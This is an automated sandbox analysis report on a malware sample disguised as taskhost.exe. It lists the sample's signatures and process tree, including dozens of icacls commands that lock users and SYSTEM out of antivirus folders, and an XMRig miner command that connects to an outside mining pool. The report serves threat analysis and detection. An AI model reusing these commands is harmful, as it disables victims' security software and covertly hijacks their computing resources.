Analysis
-
max time kernel
1052s -
max time network
1068s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
30-03-2024 23:04
General
-
Target
sss/ReaItekHD/taskhost.exe
-
Size
21.7MB
-
MD5
b2ceb39a1dc0ed07e6e91ebc1131e6af
-
SHA1
bd5d9ca87727af82c0109d8fdd44fcd090a4302a
-
SHA256
7f29a1005a7c5c936791c1f9b2a6745286a01467fb15c94beaaf72ac959aee1e
-
SHA512
c8deb6c184e58fb27f2d760c8740af5a62c4182824e9b48607eb810fa95896c8bcdbf8d50c117f06a620b8f35c3eaa59a9376f8b8b9d27ca17a2b2f2047adb07
-
SSDEEP
393216:h/f16H6QzwnoD13bPmzcAWOzOutBzA6YG7E3VHEx8OdM8E4BQ4vqd0TEX:hV4SoD13bPmzcAWUA6rE3VHEx86MgKYQ
Score
10/10
Malware Config
Signatures
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
-
XMRig Miner payload 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Themida packer 64 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
AutoIT Executable 63 IoCs
AutoIT scripts compiled to PE executables.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Drops file in Program Files directory 38 IoCs
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
NTFS ADS 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\sss\ReaItekHD\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\sss\ReaItekHD\taskhost.exe"1⤵
- Modifies visiblity of hidden/system files in Explorer
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exegpupdate /force3⤵
-
-
-
C:\ProgramData\Setup\Packs.exeC:\ProgramData\Setup\Packs.exe -ppidar2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls C:\FRST /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)2⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\ProgramData\WindowsTask\audiodg.exeC:\ProgramData\WindowsTask\audiodg.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
-
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:/ProgramData/WindowsTask/MicrosoftHost.exe -o stratum+tcp://185.195.27.66:3333 -u CPU --donate-level=1 -k --cpu-priority=0 -t42⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "99578798-16648965089346005211666517002-66507718719892648241237671764167248787"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1532076987535892868-1318982636567691549-1901693088-306722377-1917635383-1309216503"1⤵
-
